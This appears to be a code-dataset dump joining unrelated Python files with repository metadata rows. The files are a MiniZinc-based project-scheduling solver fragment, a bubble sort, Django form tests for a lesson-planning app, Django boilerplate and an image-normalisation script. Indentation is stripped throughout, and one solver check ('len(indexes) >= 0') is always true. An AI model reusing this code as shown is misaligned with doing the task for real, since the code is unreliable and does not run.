string = "constraint start[" + str(t1) + "] <= start[" + str(t2) + "];\n"
self.instance.add_string(string)
constraint_strings += [string]
if p_s.task_mode is not None:
for task in p_s.start_times:
indexes = [i for i in self.modeindex_map if self.modeindex_map[i]["task"] == task
and self.modeindex_map[i]["original_mode_index"] == p_s.task_mode[task]]
if len(indexes) >= 0:
string = "constraint mrun["+str(indexes[0])+"] == 1;"
self.instance.add_string(string)
constraint_strings += [string]
def retrieve_solutions(self, result, parameters_cp: ParametersCP=ParametersCP.default()):
intermediate_solutions = parameters_cp.intermediate_solution
best_solution = None
best_makespan = -float("inf")
list_solutions_fit = []
starts = []
mruns = []
object_result: List[MRCPSP_Result] = []
if intermediate_solutions:
for i in range(len(result)):
object_result += [result[i]]
# print("Objective : ", result[i, "objective"])
else:
object_result += [result]
for res in object_result:
modes = []
for j in range(len(res.mode_chosen)):
if (self.modeindex_map[j + 1]['task'] != 1) and (self.modeindex_map[j + 1]['task'] != self.rcpsp_model.n_jobs + 2):
modes.append(self.modeindex_map[res.mode_chosen[j]]['original_mode_index'])
elif (self.modeindex_map[j + 1]['task'] == 1) or (
self.modeindex_map[j + 1]['task'] == self.rcpsp_model.n_jobs + 2):
modes.append(1)
rcpsp_schedule = {}
start_times = res.dict["start"]
for i in range(len(start_times)):
rcpsp_schedule[i + 1] = {'start_time': start_times[i],
'end_time': start_times[i]
+ self.rcpsp_model.mode_details[i + 1][modes[i]]['duration']}
sol = RCPSPSolution(problem=self.rcpsp_model,
rcpsp_schedule=rcpsp_schedule,
rcpsp_modes=modes[1:-1],
rcpsp_schedule_feasible=True)
objective = self.aggreg_from_dict_values(self.rcpsp_model.evaluate(sol))
if objective > best_makespan:
best_makespan = objective
best_solution = sol.copy()
list_solutions_fit += [(sol, objective)]
result_storage = ResultStorage(list_solution_fits=list_solutions_fit,
best_solution=best_solution,
mode_optim=self.params_objective_function.sense_function,
limit_store=False)
return result_storage
def solve(self, parameters_cp: ParametersCP=ParametersCP.default(), **args):
if self.instance is None:
self.init_model(**args)
timeout = parameters_cp.TimeLimit
intermediate_solutions = parameters_cp.intermediate_solution
result = self.instance.solve(timeout=timedelta(seconds=timeout),
intermediate_solutions=intermediate_solutions)
verbose = args.get("verbose", True)
if verbose:
print(result.status)
return self.retrieve_solutions(result=result, parameters_cp=parameters_cp)
class CP_MRCPSP_MZN_MODES:
def __init__(self, rcpsp_model: RCPSPModel,
cp_solver_name: CPSolverName=CPSolverName.CHUFFED,
params_objective_function: ParamsObjectiveFunction=None):
self.rcpsp_model = rcpsp_model
self.instance: Instance = None
self.cp_solver_name = cp_solver_name
self.key_decision_variable = ["start", "mrun"] # For now, I've put the var names of the CP model (not the rcpsp_model)
self.aggreg_sol, self.aggreg_from_dict_values, self.params_objective_function = \
build_aggreg_function_and_params_objective(self.rcpsp_model,
params_objective_function=params_objective_function)
def init_model(self, **args):
model = Model(files_mzn["modes"])
solver = Solver.lookup(map_cp_solver_name[self.cp_solver_name])
instance = Instance(solver, model)
keys = []
n_res = len(list(self.rcpsp_model.resources.keys()))
instance["n_res"] = n_res
keys += ["n_res"]
n_tasks = self.rcpsp_model.n_jobs + 2
instance["n_tasks"] = n_tasks
keys += ["n_tasks"]
sorted_tasks = sorted(self.rcpsp_model.mode_details.keys())
n_opt = sum([len(list(self.rcpsp_model.mode_details[key].keys())) for key in sorted_tasks])
instance["n_opt"] = n_opt
keys += ["n_opt"]
modes = []
counter = 0
self.modeindex_map = {}
for act in sorted_tasks:
tmp = list(self.rcpsp_model.mode_details[act].keys())
# tmp = [counter + x for x in tmp]
for i in range(len(tmp)):
original_mode_index = tmp[i]
mod_index = counter+tmp[i]
tmp[i] = mod_index
self.modeindex_map[mod_index] = {'task': act, 'original_mode_index': original_mode_index}
modes.append(set(tmp))
counter = tmp[-1]
# print('modes: ', modes)
instance['modes'] = modes
keys += ["modes"]
rreq = []
index = 0
for res in self.rcpsp_model.resources.keys():
rreq.append([])
for task in sorted_tasks:
for mod in self.rcpsp_model.mode_details[task].keys():
rreq[index].append(int(self.rcpsp_model.mode_details[task][mod][res]))
index += 1
# print('rreq: ', rreq)
instance["rreq"] = rreq
keys += ["rreq"]
rcap = [val for val in self.rcpsp_model.resources.values()]
# print('rcap: ', rcap)
if isinstance(rcap[0], list):
rcap = [int(max(r)) for r in rcap]
instance["rcap"] = rcap
keys += ["rcap"]
rtype = [2 if res in self.rcpsp_model.non_renewable_resources else 1 for res in self.rcpsp_model.resources.keys()]
instance["rtype"] = rtype
keys += ["rtype"]
# import pymzn # For debug purposes
# pymzn.dict2dzn({k: instance[k] for k in keys}, fout="debug_modes_satisfaction.dzn")
self.instance: Instance = instance
p_s: Union[PartialSolution, None] = args.get("partial_solution", None)
if p_s is not None:
constraint_strings = []
if p_s.task_mode is not None:
for task in p_s.start_times:
indexes = [i for i in self.modeindex_map if self.modeindex_map[i]["task"] == task
and self.modeindex_map[i]["original_mode_index"] == p_s.task_mode[task]]
if len(indexes) >= 0:
print("Index found : ", len(indexes))
string = "constraint mrun[" + str(indexes[0]) + "] == 1;"
self.instance.add_string(string)
constraint_strings += [string]
def retrieve_solutions(self, result, parameters_cp: ParametersCP=ParametersCP.default()):
intermediate_solutions = parameters_cp.intermediate_solution
best_solution = None
best_makespan = -float("inf")
list_solutions_fit = []
mruns = []
if intermediate_solutions:
for i in range(len(result)):
mruns += [result[i, "mrun"]]
else:
mruns += [result["mrun"]]
all_modes = []
for mrun in mruns:
modes = [1]*(self.rcpsp_model.n_jobs+2)
for i in range(len(mrun)):
if mrun[i] == 1 and (self.modeindex_map[i + 1]['task'] != 1) and (
self.modeindex_map[i + 1]['task'] != self.rcpsp_model.n_jobs + 2):
modes[self.modeindex_map[i+1]['task']-1] = self.modeindex_map[i + 1]['original_mode_index']
all_modes += [modes]
return all_modes
def solve(self, parameters_cp: ParametersCP = None, **args):
if parameters_cp is None:
parameters_cp = ParametersCP.default()
if self.instance is None:
self.init_model(**args)
timeout = parameters_cp.TimeLimit
intermediate_solutions = parameters_cp.intermediate_solution
result = self.instance.solve(timeout=timedelta(seconds=timeout),
# nr_solutions=1000,
# nr_solutions=1,
nr_solutions=parameters_cp.nr_solutions
if not parameters_cp.all_solutions else None,
all_solutions=parameters_cp.all_solutions)
#intermediate_solutions=intermediate_solutions)
verbose = args.get("verbose", False)
if verbose:
print(result.status)
return self.retrieve_solutions(result=result, parameters_cp=parameters_cp)
| [
"guillaume.alleon@gmail.com"
] | guillaume.alleon@gmail.com |
67122d17e933488f9e88e64701632d1088a4001e | 31c9cd96667166ac4af15ce8b48753167da3084d | /sorting/bubble_sort.py | 1c21807ac98a7e18e5e4c1b990067d0c11664874 | [] | no_license | vitorponce/algorithms | a8e305e32e38bbb2f473dc07c0e93bdf6a10fde0 | 87d5f3e3110394d21844b7f3a17468e01a366e83 | refs/heads/master | 2022-06-17T04:04:18.757909 | 2020-05-04T03:03:09 | 2020-05-04T03:03:09 | 259,844,564 | 1 | 0 | null | 2020-05-04T03:04:54 | 2020-04-29T06:34:52 | Python | UTF-8 | Python | false | false | 1,717 | py |
def bubble_sort(input_list):
"""
The smallest element bubbles to the correct position
by comparing adjacent elements.
For each iteration, every element is compared with its neighbor
and swapped if they arent in the right order.
Smallest elements 'bubble' to the beginning of the list.
At the end fo the first iteration, the smallest element is in the
right position, at the end of the second iteration, the second
smallest is in the right position and so on
Complexity: O(n^2) in the worst case
- in worst case (list is sorted in descending order)
"n" elements are checked and swapped for each selected
element to get to the correct position
Stable: Yes
- logical ordering will be maintained
Memory: O(1)
- sorts in place, original list re-used so no extra space
Adaptivity: YES
- if there were no swaps on an iteration, we know the list
is already sorted, and we can break out early
Number of comparisons and swaps:
- O(n^2) comparisons and O(n^2) swaps
- more swaps than selection sort!
Discussion:
- O(n^2) == bad
- advantage over selection sort: adaptivity
"""
for i in range(len(input_list)):
swapped = False
# again, i represents the last position in list that is sorted
for j in range(len(input_list) - 1, i, -1):
if input_list[j] < input_list[j-1]:
input_list[j-1], input_list[j] = input_list[j], input_list[j-1]
swapped = True
# if no swaps, list is already in sorted state and we can break out
if not swapped:
break
return input_list
| [
"johneshiver@gmail.com"
] | johneshiver@gmail.com |
f2adc406f14969652f3164a491950f2f9bffb8cb | be30bbbf845fb27b6073aa64f9700fb1b6866b04 | /planificaciones/tests/test_forms.py | 055f9a6377adbe3b4694f3f1eca0bc9d62e5ac1f | [] | no_license | cesardlinx/asistentecatedra | ef34aae2f981e864b3e858c05efe9524c6e5a8c3 | 8ff935383fa9355d4f47c358a9971cff8ab8a92c | refs/heads/master | 2020-04-17T10:03:28.583461 | 2020-01-07T18:03:05 | 2020-01-07T18:03:05 | 166,485,635 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,103 | py | import pytest
from planificaciones.forms.elemento_curricular_formset import \
ElementoCurricularFormset
from planificaciones.forms.desarrollo_unidad_formset import \
DesarrolloUnidadFormset
from planificaciones.forms.actividad_aprendizaje_formset import \
ActividadAprendizajeFormset
from planificaciones.forms.plan_destrezas_form import PlanDestrezasForm
from planificaciones.forms.plan_anual_form import PlanAnualForm
from planificaciones.forms.plan_unidad_form import PlanUnidadForm
from planificaciones.forms.plan_clase_form import PlanClaseForm
from .planificaciones_testcase import PlanificacionesTestCase
from django.core.exceptions import ValidationError
pytestmark = pytest.mark.django_db
class TestPlanClaseForm(PlanificacionesTestCase):
def setUp(self):
super().setUp()
self.data = {
'name': 'Plan de Clase1',
'docentes': 'David',
'numero_plan': 2,
'fecha': '2019-01-20',
'asignatura': self.asignatura.id,
'cursos': [str(self.curso_1.id), str(self.curso_2.id)],
'paralelos': 'A y C',
'numero_estudiantes': '23',
'tema': 'Tema del plan',
'periodos': 'Períodos del plan',
'metodologia': 'Metodología del plan de clase',
'tecnica': 'Tecnica usada',
'objetivos': [str(self.objetivo_1.id), str(self.objetivo_2.id)],
'bibliografia': 'Lorem ipsum dolor sit amet.',
'contenido_cientifico': 'Lorem ipsum dolor sit amet.',
'material_didactico': 'Lorem ipsum dolor sit amet.',
'instrumento_evaluacion': 'Lorem ipsum dolor sit amet.',
}
def test_valid_data(self):
form = PlanClaseForm(self.data)
assert form.is_valid() is True, 'The form should be valid'
def test_empty_data(self):
form = PlanClaseForm({})
assert form.is_valid() is False, 'The form should be invalid'
def test_invalid_data(self):
data = self.data
data['asignatura'] = 'lorem ipsum'
form = PlanClaseForm(data)
assert form.is_valid() is False, 'The form should be invalid'
class TestElementoCurricularFormset(PlanificacionesTestCase):
def setUp(self):
super().setUp()
self.data = {
'asignatura': self.asignatura.id,
'cursos': [self.curso_1.id, self.curso_2.id],
# Formset Elementos curriculares 1
'elementos_curriculares-TOTAL_FORMS': '2',
'elementos_curriculares-INITIAL_FORMS': '0',
'elementos_curriculares-MIN_NUM_FORMS': '0',
'elementos_curriculares-MAX_NUM_FORMS': '1000',
'elementos_curriculares-0-destreza': self.destreza_1.id,
'elementos_curriculares-0-conocimientos_asociados': 'lorem ipsum',
'elementos_curriculares-0-actividades_evaluacion': 'lorem ipsum',
'elementos_curriculares-1-destreza': self.destreza_1.id,
'elementos_curriculares-1-conocimientos_asociados': 'lorem ipsum',
'elementos_curriculares-1-actividades_evaluacion': 'lorem ipsum',
# Formset Procesos didacticos
'proceso-elementos_curriculares-0-procesos_didacticos-'\
'TOTAL_FORMS': '2',
'proceso-elementos_curriculares-0-procesos_didacticos-'\
'INITIAL_FORMS': '0',
'proceso-elementos_curriculares-0-procesos_didacticos-'\
'MIN_NUM_FORMS': '0',
'proceso-elementos_curriculares-0-procesos_didacticos-'\
'MAX_NUM_FORMS': '10',
'proceso-elementos_curriculares-0-procesos_didacticos-0-'\
'name': 'lorem',
'proceso-elementos_curriculares-0-procesos_didacticos-0-'\
'description': 'lorem ipsum',
'proceso-elementos_curriculares-0-procesos_didacticos-0-'\
'tiempo': 'lorem ipsum',
'proceso-elementos_curriculares-0-procesos_didacticos-0-'\
'recursos': 'lorem ipsum',
'proceso-elementos_curriculares-0-procesos_didacticos-1-'\
'name': 'lorem',
'proceso-elementos_curriculares-0-procesos_didacticos-1-'\
'description': 'lorem ipsum',
'proceso-elementos_curriculares-0-procesos_didacticos-1-'\
'tiempo': 'lorem ipsum',
'proceso-elementos_curriculares-0-procesos_didacticos-1-'\
'recursos': 'lorem ipsum',
'proceso-elementos_curriculares-1-procesos_didacticos-'\
'TOTAL_FORMS': '1',
'proceso-elementos_curriculares-1-procesos_didacticos-'\
'INITIAL_FORMS': '0',
'proceso-elementos_curriculares-1-procesos_didacticos-'\
'MIN_NUM_FORMS': '0',
'proceso-elementos_curriculares-1-procesos_didacticos-'\
'MAX_NUM_FORMS': '10',
'proceso-elementos_curriculares-1-procesos_didacticos-0-'\
'name': 'lorem',
'proceso-elementos_curriculares-1-procesos_didacticos-0-'\
'description': 'lorem ipsum',
'proceso-elementos_curriculares-1-procesos_didacticos-0-'\
'tiempo': 'lorem ipsum',
'proceso-elementos_curriculares-1-procesos_didacticos-0-'\
'recursos': 'lorem ipsum',
}
def test_valid_data(self):
formset = ElementoCurricularFormset(self.data)
assert formset.is_valid() is True, 'The formset should be valid'
def test_empty_data(self):
with pytest.raises(ValidationError,
match='Los datos de ManagementForm faltan o han '
'sido manipulados'):
formset = ElementoCurricularFormset({})
formset.is_valid()
def test_invalid_data(self):
data = self.data
data['asignatura'] = 'lorem ipsum'
data['elementos_curriculares-0-destreza'] = 'lorem ipsum'
formset = ElementoCurricularFormset(data)
assert formset.is_valid() is False, 'The formset should be invalid'
class TestPlanAnualForm(PlanificacionesTestCase):
def setUp(self):
super().setUp()
self.data = {
'name': 'Plan de Anual1',
'ano_lectivo': '2019-2020',
'docentes': 'David Padilla, Tatiana Carpio',
'asignatura': self.asignatura.id,
'curso': self.curso_1.id,
'paralelos': 'A y C',
'carga_horaria': 20,
'semanas_trabajo': 10,
'semanas_imprevistos': 2,
'objetivos_generales': [str(self.general_1.id),
str(self.general_2.id)],
'objetivos_curso': [str(self.objetivo_1.id),
str(self.objetivo_2.id)],
'objetivos_generales_curso': [str(self.general_1.id),
str(self.general_2.id)],
'ejes_transversales': 'Lorem ipsum dolor sit amet.',
'bibliografia': 'Lorem ipsum dolor sit amet.',
'observaciones': 'Tecnica usada',
}
def test_valid_data(self):
form = PlanAnualForm(self.data)
assert form.is_valid() is True, 'The form should be valid'
def test_empty_data(self):
form = PlanAnualForm({})
assert form.is_valid() is False, 'The form should be invalid'
def test_invalid_data(self):
data = self.data
data['asignatura'] = 'lorem ipsum'
form = PlanAnualForm(data)
assert form.is_valid() is False, 'The form should be invalid'
class TestDesarrolloUnidadFormset(PlanificacionesTestCase):
def setUp(self):
super().setUp()
self.data = {
'asignatura': self.asignatura.id,
'curso': self.curso_1.id,
# Formset Desarrollo Unidad 1
'desarrollo_unidades-TOTAL_FORMS': '2',
'desarrollo_unidades-INITIAL_FORMS': '0',
'desarrollo_unidades-MIN_NUM_FORMS': '0',
'desarrollo_unidades-MAX_NUM_FORMS': '1000',
'desarrollo_unidades-0-unidad': self.unidad_1.id,
'desarrollo_unidades-0-objetivos': [self.objetivo_1.id,
self.objetivo_2.id],
'desarrollo_unidades-0-objetivos_generales': [self.general_1.id,
self.general_2.id],
'desarrollo_unidades-0-destrezas': [self.destreza_1.id,
self.destreza_2.id],
'desarrollo_unidades-0-orientaciones_metodologicas': 'lorem ipsum',
'desarrollo_unidades-0-semanas': 7,
# Formset Desarrollo Unidad 2
'desarrollo_unidades-1-unidad': self.unidad_1.id,
'desarrollo_unidades-1-objetivos': [self.objetivo_1.id,
self.objetivo_2.id],
'desarrollo_unidades-1-objetivos_generales': [self.general_1.id,
self.general_2.id],
'desarrollo_unidades-1-destrezas': [self.destreza_1.id,
self.destreza_2.id],
'desarrollo_unidades-1-orientaciones_metodologicas': 'lorem ipsum',
'desarrollo_unidades-1-semanas': 8,
}
def test_valid_data(self):
formset = DesarrolloUnidadFormset(self.data)
assert formset.is_valid() is True, 'The formset should be valid'
def test_empty_data(self):
with pytest.raises(ValidationError,
match='Los datos de ManagementForm faltan o han '
'sido manipulados'):
formset = DesarrolloUnidadFormset({})
formset.is_valid()
def test_invalid_data(self):
data = self.data
data['asignatura'] = 'lorem ipsum'
data['desarrollo_unidades-0-unidad'] = 'lorem ipsum'
formset = DesarrolloUnidadFormset(data)
assert formset.is_valid() is False, 'The formset should be invalid'
class TestPlanUnidadForm(PlanificacionesTestCase):
def setUp(self):
super().setUp()
self.data = {
'name': 'Plan de Unidad1',
'ano_lectivo': '2019-2020',
'docentes': 'David Padilla, Tatiana Carpio',
'unidad': self.unidad_1.id,
'asignatura': self.asignatura.id,
'curso': self.curso_1.id,
'paralelos': 'A y C',
'periodos': 20,
'tiempo': 20,
'objetivos': [str(self.objetivo_1.id),
str(self.objetivo_2.id)],
'objetivos_generales': [str(self.general_1.id),
str(self.general_2.id)],
'necesidad_adaptacion': 'Lorem ipsum dolor sit amet.',
'adaptacion-curricular': 'Lorem ipsum dolor sit amet.',
}
def test_valid_data(self):
form = PlanUnidadForm(self.data)
assert form.is_valid() is True, 'The form should be valid'
def test_empty_data(self):
form = PlanUnidadForm({})
assert form.is_valid() is False, 'The form should be invalid'
def test_invalid_data(self):
data = self.data
data['asignatura'] = 'lorem ipsum'
form = PlanUnidadForm(data)
assert form.is_valid() is False, 'The form should be invalid'
class TestActividadesAprendizajeFormset(PlanificacionesTestCase):
def setUp(self):
super().setUp()
self.data = {
'asignatura': self.asignatura.id,
'curso': self.curso_1.id,
# Formset Actividades Aprendizaje 1
'actividades_aprendizaje-TOTAL_FORMS': '2',
'actividades_aprendizaje-INITIAL_FORMS': '0',
'actividades_aprendizaje-MIN_NUM_FORMS': '0',
'actividades_aprendizaje-MAX_NUM_FORMS': '1000',
'actividades_aprendizaje-0-destrezas': [self.destreza_1.id,
self.destreza_2.id],
'actividades_aprendizaje-0-estrategias_metodologicas': 'lorem ips',
'actividades_aprendizaje-0-recursos': 'lorem ipsum',
'actividades_aprendizaje-0-instrumentos_evaluacion': 'lorem ipsum',
# Formset Actividades Aprendizaje 2
'actividades_aprendizaje-1-destrezas': [
self.destreza_1.id,
self.destreza_2.id
],
'actividades_aprendizaje-1-estrategias_metodologicas': 'lorem ips',
'actividades_aprendizaje-1-recursos': 'lorem ipsum',
'actividades_aprendizaje-1-instrumentos_evaluacion': 'lorem ipsum',
}
def test_valid_data(self):
formset = ActividadAprendizajeFormset(self.data)
assert formset.is_valid() is True, 'The formset should be valid'
def test_empty_data(self):
with pytest.raises(ValidationError,
match='Los datos de ManagementForm faltan o han '
'sido manipulados'):
formset = ActividadAprendizajeFormset({})
formset.is_valid()
def test_invalid_data(self):
data = self.data
data['asignatura'] = 'lorem ipsum'
data['actividades_aprendizaje-0-destrezas'] = 'lorem ipsum'
formset = ActividadAprendizajeFormset(data)
assert formset.is_valid() is False, 'The formset should be invalid'
class TestPlanDestrezasForm(PlanificacionesTestCase):
def setUp(self):
super().setUp()
self.data = {
'name': 'Plan de Unidad1',
'ano_lectivo': '2019-2020',
'docentes': 'David Padilla, Tatiana Carpio',
'unidad': self.unidad_1.id,
'asignatura': self.asignatura.id,
'curso': self.curso_1.id,
'paralelos': 'A y C',
'periodos': 20,
'semana_inicio': 'lorem ipsum dolor sit amet.',
'ejes_transversales': 'lorem ipsum dolor sit amet.',
'objetivos': [str(self.objetivo_1.id),
str(self.objetivo_2.id)],
'objetivos_generales': [str(self.general_1.id),
str(self.general_2.id)],
'destrezas': [str(self.destreza_1.id),
str(self.destreza_2.id)],
'estrategias_metodologicas': 'lorem ipsum',
'recursos': 'lorem ipsum',
'actividades_evaluacion': 'lorem ipsum',
'necesidad_adaptacion': 'Lorem ipsum dolor sit amet.',
'adaptacion-curricular': 'Lorem ipsum dolor sit amet.',
}
def test_valid_data(self):
form = PlanDestrezasForm(self.data)
assert form.is_valid() is True, 'The form should be valid'
def test_empty_data(self):
form = PlanDestrezasForm({})
assert form.is_valid() is False, 'The form should be invalid'
def test_invalid_data(self):
data = self.data
data['asignatura'] = 'lorem ipsum'
form = PlanDestrezasForm(data)
assert form.is_valid() is False, 'The form should be invalid'
| [
"davidpadilla.f22@gmail.com"
] | davidpadilla.f22@gmail.com |
720a56c10cccc12611a5449ed08c5b5bd97011cb | 62265be73a441f2bb4e3319cd67b80df46482ddd | /backend/env/bin/django-admin.py | 40a1625db5e01e5461685f0152c0602bee0cc54f | [] | no_license | HuuThang-1402/Web_Demo | c16c687eb7e5e3e634e8cd00916abd9a0eef57e3 | 1f8c8b9db074ced89c81de854adff43868591c71 | refs/heads/main | 2023-07-25T18:15:31.531037 | 2021-09-01T15:11:43 | 2021-09-01T15:11:43 | 402,098,944 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 698 | py | #!/home/estella/Code/Web/ReactJS/djreact/backend/env/bin/python
# When the django-admin.py deprecation ends, remove this script.
import warnings
from django.core import management
try:
from django.utils.deprecation import RemovedInDjango40Warning
except ImportError:
raise ImportError(
'django-admin.py was deprecated in Django 3.1 and removed in Django '
'4.0. Please manually remove this script from your virtual environment '
'and use django-admin instead.'
)
if __name__ == "__main__":
warnings.warn(
'django-admin.py is deprecated in favor of django-admin.',
RemovedInDjango40Warning,
)
management.execute_from_command_line()
| [
"thang.nguyen2018@hcmut.edu.vn"
] | thang.nguyen2018@hcmut.edu.vn |
0db65fdb7ef44d4f2743946601e0a9f2ce3b83c1 | 06b72967c7a0e0df5cf4cab9fc9c96055410136f | /Web Eng/venv/bin/rst2man.py | 34044a34734a8d45c588e8008da252feef6af27f | [] | no_license | YonaMoreda/WEB_ENG_2019 | c0be2661c833563b09121ae447d6c60c00787f89 | 2116b29a0ad80ff8a132655bd66bf1320fb798f3 | refs/heads/master | 2022-03-05T04:00:09.698800 | 2019-11-06T12:17:37 | 2019-11-06T12:17:37 | 212,578,721 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 632 | py | #!/Users/wine_king/Desktop/Web Eng/venv/bin/python
# Author:
# Contact: grubert@users.sf.net
# Copyright: This module has been placed in the public domain.
"""
man.py
======
This module provides a simple command line interface that uses the
man page writer to output from ReStructuredText source.
"""
import locale
try:
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
from docutils.writers import manpage
description = ("Generates plain unix manual documents. " + default_description)
publish_cmdline(writer=manpage.Writer(), description=description)
| [
"r.c.patrona@student.rug.nl"
] | r.c.patrona@student.rug.nl |
18c3149c607ffbaa74d665b406d17f4317de36b1 | bff37feea8ee123c6ec4a147e3591d89dc1a2421 | /backend/manage.py | 44693110ac920023873ab512def90d73d690fabf | [] | no_license | msherrington/basketApp | c00b3ccb6a37fae6186771cc061e7cd5b9b61cd1 | eccc8011c14134a4613ecee0a32d4d3c4905ea05 | refs/heads/master | 2022-04-01T11:49:06.407156 | 2020-02-18T22:34:36 | 2020-02-18T22:34:36 | 240,595,732 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 538 | py | #!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'basket.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| [
"git@marksherrington.uk"
] | git@marksherrington.uk |
c17cfddbe71929b5dd9f44731af66f2d81cb0f1d | a0342ba96c88cafae5855ffa9a493df979d03caf | /index/urls.py | bed7af56439270865c619834af546f825e26982e | [] | no_license | themusecatcher/lab-manage-system | 37ddf3f4ec5e9683dcf01c951b07851143f867d2 | c979f2d75a3920cbad822804e9732dcb0a6b1f42 | refs/heads/master | 2023-06-08T12:41:43.186488 | 2021-06-16T09:11:54 | 2021-06-16T09:11:54 | 377,435,986 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 478 | py | # MyDjango URL Configuration
from django.urls import path
from .views import *
urlpatterns = [
#首页路由,id为用户主键id
path('index/<int:id>/<int:page>', indexView, name='index'),
#用户id和每条通知记录的主键id(noticeId),type用来判断用户是否是在当前页面进行刷新
path('notice/<int:id>/<int:noticeId>/<int:type>',noticeView,name='notice'),
#用户帮助
path('userHelp/<int:id>',userHelpView,name='userHelp'),
]
| [
"d_muses@163.com"
] | d_muses@163.com |
71581e2aa28a19aa508f908fff09ae9da3e41017 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_connoisseur.py | f2ebfdee7349c5f0eb2d9d637ed4b4d9b3670125 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 419 | py |
#calss header
class _CONNOISSEUR():
def __init__(self,):
self.name = "CONNOISSEUR"
self.definitions = [u'a person who knows a lot about and enjoys one of the arts, or food, drink, etc. and can judge quality and skill in that subject: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
8fbe1926271a509d55450e06a266c466ed4ae9c9 | d10dddad690b42e1c62207d6eaaa31c5c858c434 | /prePro_pipeline_3D/norm.py | 16d41f3270204d8389dd3e7eab54b89826b4c667 | [
"Apache-2.0"
] | permissive | wahlby-lab/graph-iss | 874d5985d7eab96220f701b2087bb0e9ee0783ca | ef794ee615da91c17c55b2e2d6101cec3873df29 | refs/heads/master | 2021-08-17T04:41:24.870882 | 2020-07-02T11:19:20 | 2020-07-02T11:19:20 | 199,853,991 | 10 | 3 | null | null | null | null | UTF-8 | Python | false | false | 2,737 | py | """ Compute normalization intervals for each channel and round.
Parameters
----------
sys.argv[1] : input csv file contaning an array of input images
sys.argv[2] : upper percentile value of 98th percentile distri-
bution of image patches for signal level estimation.
sys.argv[3] : number of running threads. Each thread run over
an image.
sys.argv[4] : output csv file where to store computed intervals
sys.argv[5] : number of random patches used to estimate norma-
lization intervals
"""
import numpy as np
from skimage import io
from scipy import stats
import sys
import pandas as pd
import pickle
from sklearn.feature_extraction.image import extract_patches_2d
from joblib import Parallel,delayed
def faster_mode1D(a):
arr = np.asarray(a) # would be _chk_array
v, c = stats.find_repeats(arr)
if len(c) == 0:
arr.sort() # mimic first value behavior
return arr[0], 1.
else:
pos = c.argmax()
return v[pos], c[pos]
def runParallel(row, seed):
out = []
img = io.imread(row.File)
img=np.amax(img,axis=0)
patch_size = 128
patches = extract_patches_2d(img, (patch_size,patch_size), max_patches=int(sys.argv[5]), random_state=int(seed))
del(img)
patch = []
nonZero_px = patch_size*patch_size/4*3
for i in range(len(patches)):
if len(patches[i][patches[i]!=0]>=nonZero_px):
patch.append(patches[i])
del(patches)
# Lower bound
bkg = np.mean([faster_mode1D(patch[i][patch[i]!=0])[0] for i in range(len(patch))])
print(bkg)
out.append(bkg)
# Upper bound
signal = np.percentile([np.percentile(patch[i],float(sys.argv[2])) for i in range(len(patch))],98)
print(signal)
out.append(signal)
return out
imgCSV = pd.read_csv(sys.argv[1],sep='\t')
n_chs = 6
n_cycles = int(len(imgCSV)/6)
seed = np.random.random_integers(1,100)
res = Parallel(n_jobs=int(sys.argv[3]))(delayed(runParallel)(row,seed) for i, row in imgCSV.iterrows())
img_stats = np.zeros((n_cycles, n_chs, 2))
for i in range(0,len(res),6):
img_stats[int(i/n_chs),5,0] = res[i+5][0]; img_stats[int(i/n_chs),5,1] = res[i+5][1] # chanA
img_stats[int(i/n_chs),4,0] = res[i+4][0]; img_stats[int(i/n_chs),4,1] = res[i+4][1] # chanC
img_stats[int(i/n_chs),0,0] = res[i][0]; img_stats[int(i/n_chs),0,1] = res[i][1] # chanDO
img_stats[int(i/n_chs),3,0] = res[i+3][0]; img_stats[int(i/n_chs),3,1] = res[i+3][1] # chanG
img_stats[int(i/n_chs),1,0] = res[i+1][0]; img_stats[int(i/n_chs),1,1] = res[i+1][1] # chanNuclei
img_stats[int(i/n_chs),2,0] = res[i+2][0]; img_stats[int(i/n_chs),2,1] = res[i+2][1] # chanT
pickle.dump(img_stats,open(sys.argv[4],'wb'))
| [
"gabriele.partel@it.uu.se"
] | gabriele.partel@it.uu.se |
80e15aa2909bac3ed5c0402bcf8ea3b7316693af | d7b3257892d3d0cdad76f8b6990f84ab09ff743a | /testing.py | b2348a25826ffb723a4afcb3827ff6e752c5a5e3 | [] | no_license | ninmonkey/roguelike-skeleton | f8398135921a19ca1c1bb855d527c62cfd8ae44e | 552f2e5927b205034821b5ba2c75c764cf1348e4 | refs/heads/master | 2022-07-19T00:09:00.892215 | 2018-09-06T17:00:30 | 2018-09-06T17:00:30 | 144,588,502 | 0 | 0 | null | 2022-06-21T21:24:02 | 2018-08-13T14:07:54 | Python | UTF-8 | Python | false | false | 51 | py | # load map from json dump
# pathfind
# test result
| [
"ninmonkeys@gmail.com"
] | ninmonkeys@gmail.com |
e9031bde2c5620bbc80017e57ea1f7ecde3b471c | 8c1c8eb854287575e7cfadf8c67f14365f9d8835 | /rabbit_tools/delete.py | a0d95d44189098e9446012ca5037ab88bb573a04 | [
"MIT"
